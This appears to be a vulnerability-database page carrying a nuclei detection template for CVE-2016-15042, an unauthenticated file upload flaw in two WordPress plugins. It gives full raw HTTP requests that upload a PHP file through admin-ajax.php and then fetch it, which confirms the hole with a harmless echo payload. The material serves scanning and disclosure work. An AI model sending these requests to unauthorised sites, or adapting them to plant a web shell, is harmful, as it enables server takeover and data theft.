Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Frontend File Manager < 4.0 & N-Media Post Frontend < 1.1 - Arbitrary File Upload

🗓️ 23 Jun 2026 05:08:33Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 14 Views

This vulnerability allows unauthenticated arbitrary file upload in WordPress Frontend File Manager and N-Media Post Front End.

Related
Refs
Code
id: CVE-2016-15042

info:
  name: WordPress Frontend File Manager < 4.0 & N-Media Post Frontend < 1.1 - Arbitrary File Upload
  author: jsnv-dev
  severity: critical
  description: |
    The Frontend File Manager plugin (<4.0) and N-Media Post Front-end Form plugin (<1.1) for WordPress were vulnerable to arbitrary file uploads due to missing file type validation. This allowed unauthenticated attackers to upload arbitrary files and potentially achieve remote code execution.
  impact: |
    Unauthenticated attackers can upload malicious files (such as PHP web shells) and execute arbitrary code, leading to complete server compromise, data theft, and potential lateral movement within the network.
  remediation: |
    Update Frontend File Manager to version 4.0 or later, and N-Media Post Front-end Form to version 1.1 or later.
  reference:
    - https://www.pluginvulnerabilities.com/2016/09/19/arbitrary-file-upload-vulnerability-in-front-end-file-upload-and-manager-plugin/
    - https://www.pluginvulnerabilities.com/2016/09/19/arbitrary-file-upload-vulnerability-in-n-media-post-front-end-form/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-15042
    - https://wordpress.org/plugins/nmedia-user-file-uploader/#developers
    - https://wpscan.com/vulnerability/052f7d9a-aaff-4fb1-92b7-aeb83cc705a7
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-15042
    cwe-id: CWE-434
    epss-score: 0.05515
    epss-percentile: 0.91783
    cpe: cpe:2.3:a:najeebmedia:frontend_file_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: najeebmedia
    product: frontend_file_manager
    framework: wordpress
  tags: cve,cve2016,wordpress,wp-plugin,n-media,post-frontend,intrusive,unauth,file-upload,vkev,vuln

variables:
  randstr_name: "{{randstr}}"
  randstr_content: "{{randstr}}"
  filename: "{{to_lower(randstr_name)}}.php"
  content: "<?php echo '{{randstr_content}}'; ?>"

flow: http(1) || http(2)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr_val}}

        ------WebKitFormBoundary{{randstr_val}}
        Content-Disposition: form-data; name="action"

        nm_postfront_upload_file
        ------WebKitFormBoundary{{randstr_val}}
        Content-Disposition: form-data; name="name"

        {{filename}}
        ------WebKitFormBoundary{{randstr_val}}
        Content-Disposition: form-data; name="file"; filename="{{filename}}"
        Content-Type: application/octet-stream

        {{content}}
        ------WebKitFormBoundary{{randstr_val}}--

      - |
        GET /wp-content/uploads/post_files/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: n-media-post-frontend-upload
        dsl:
          - 'status_code == 200'
          - 'contains_all(body_1, "{{filename}}","file_name")'
          - 'contains(body_2, "{{randstr_content}}")'
        condition: and

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr_val}}

        ------WebKitFormBoundary{{randstr_val}}
        Content-Disposition: form-data; name="action"

        nm_filemanager_upload_file
        ------WebKitFormBoundary{{randstr_val}}
        Content-Disposition: form-data; name="name"

        {{filename}}
        ------WebKitFormBoundary{{randstr_val}}
        Content-Disposition: form-data; name="file"; filename="{{filename}}"
        Content-Type: application/octet-stream

        {{content}}
        ------WebKitFormBoundary{{randstr_val}}--

      - |
        GET /wp-content/uploads/user_uploads/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: frontend-file-manager-upload
        dsl:
          - 'status_code == 200'
          - 'contains_all(body_1, "{{filename}}","file_name")'
          - 'contains(body_2, "{{randstr_content}}")'
        condition: and
# digest: 4a0a00473045022045b99f68354668dc8fdfa99b98bc7690e965622fd00c73bc0add5f35b266195a022100d0c047352ede8644b864412665c8640effe9b5de65166a0ca46eacc79d2383fe:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.19.8
EPSS0.05515
SSVC
cvewordpressfrontend file managern mediapost frontendarbitrary file uploadunauthenticated
14